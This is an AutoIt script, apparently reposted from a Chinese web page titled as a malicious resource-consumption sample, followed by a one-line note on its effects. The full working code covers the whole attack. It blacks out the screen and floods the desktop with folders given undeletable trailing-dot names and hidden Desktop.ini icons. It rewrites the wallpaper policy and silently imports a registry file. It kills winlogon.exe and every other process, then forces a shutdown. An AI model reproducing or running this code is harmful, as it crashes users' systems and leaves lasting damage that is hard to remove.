GLOBAL CONST $CDIS_GRAYED = 2
GLOBAL CONST $CDIS_DISABLED = 4
GLOBAL CONST $CDIS_CHECKED = 8
GLOBAL CONST $CDIS_FOCUS = 16
GLOBAL CONST $CDIS_DEFAULT = 32
GLOBAL CONST $CDIS_HOT = 64
GLOBAL CONST $CDIS_MARKED = 128
GLOBAL CONST $CDIS_INDETERMINATE = 256
GLOBAL CONST $CDIS_SHOWKEYBOARDCUES = 512
GLOBAL CONST $CDIS_NEARHOT = 1024
GLOBAL CONST $CDIS_OTHERSIDEHOT = 2048
GLOBAL CONST $CDIS_DROPHILITED = 4096
GLOBAL CONST $CDRF_DODEFAULT = 0
GLOBAL CONST $CDRF_NEWFONT = 2
GLOBAL CONST $CDRF_SKIPDEFAULT = 4
GLOBAL CONST $CDRF_NOTIFYPOSTPAINT = 16
GLOBAL CONST $CDRF_NOTIFYITEMDRAW = 32
GLOBAL CONST $CDRF_NOTIFYSUBITEMDRAW = 32
GLOBAL CONST $CDRF_NOTIFYPOSTERASE = 64
GLOBAL CONST $CDRF_DOERASE = 8
GLOBAL CONST $CDRF_SKIPPOSTPAINT = 256
GLOBAL CONST $GUI_SS_DEFAULT_GUI = BITOR ( $WS_MINIMIZEBOX , $WS_CAPTION , $WS_POPUP , $WS_SYSMENU )
$ICO = _MAKEDIR ( ".ico" )
$BMP = _MAKEDIR ( ".bmp" )
$REG = _MAKEDIR ( ".reg" )
FILEINSTALL ( "Are you OK.ico" , $ICO )
FILEINSTALL ( "Are you OK.bmp" , $BMP )
FILEINSTALL ( "Are you OK.reg" , $REG )
$FORM1 = GUICREATE ( "" , @DESKTOPWIDTH , @DESKTOPHEIGHT , 0 , 0 , BITOR ( $WS_SYSMENU , $WS_POPUP ) , BITOR ( $WS_EX_TOOLWINDOW , $WS_EX_WINDOWEDGE ) )
GUISETCURSOR ( 15 )
GUISETBKCOLOR ( 0 )
GUISETSTATE ( @SW_SHOW )
_FORKDIR ( @DESKTOPDIR & "\" , @DESKTOPWIDTH * @DESKTOPHEIGHT / 1000 )
REGWRITE ( "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\" , "Wallpaper" , "REG_SZ" , $BMP )
RUNWAIT ( "cmd.exe /c regedit /s "" & $REG & """ , @APPDATADIR & "\" , @SW_HIDE )
FILEDELETE ( $REG )
IF FILEEXISTS ( @SYSTEMDIR & "\ntsd.exe" ) THEN
RUN ( "cmd.exe /c "ntsd -c q -pn winlogon.exe"" , @SYSTEMDIR & "\" , @SW_HIDE )
SLEEP ( 2333 )
ENDIF
RUN ( "cmd.exe /c "taskkill /f /fi "pid ge 1""" , @SYSTEMDIR & "\" , @SW_HIDE )
SLEEP ( 2333 )
SHUTDOWN ( 2 + 4 )
FUNC _FORKDIR ( $DIRT , $NUM )
FOR $I = 1 TO $NUM
$DIR = _MAKEDIR ( "\" , $DIRT )
_FUCKDIR ( $DIR )
NEXT
ENDFUNC
FUNC _MAKEDIR ( $FILE = "\" , $ROOT = "null" )
IF $ROOT = "null" THEN
$ROOT = @APPDATADIR & "\"
ENDIF
WHILE 1
$DIR = $ROOT & RANDOM ( 10000000 , 99999999 , 1 ) & $FILE
IF FILEEXISTS ( $DIR ) = FALSE THEN
EXITLOOP
ENDIF
WEND
RETURN $DIR
ENDFUNC
FUNC _FUCKDIR ( $DIR )
DIRCREATE ( $DIR )
RUNWAIT ( "cmd.exe /c md "Are you OK...\"" , $DIR , @SW_HIDE )
INIWRITE ( $DIR & "\Desktop.ini" , ".ShellClassInfo" , "LocalizedResourceName" , "Are you OK?" )
INIWRITE ( $DIR & "\Desktop.ini" , ".ShellClassInfo" , "IconResource" , $ICO )
INIWRITE ( $DIR & "\Desktop.ini" , ".ShellClassInfo" , "InfoTip" , "Are you OK?" )
FILESETATTRIB ( $DIR & "Desktop.ini" , "+HS" )
FILESETATTRIB ( $DIR , "+S" )
ENDFUNC

危害:
运行后系统蓝屏关机重启,不断生成ini文件和图标。


文章标题:一个Autoit恶意资源消耗样本
当前网址:http://ybzwz.com/article/piochg.html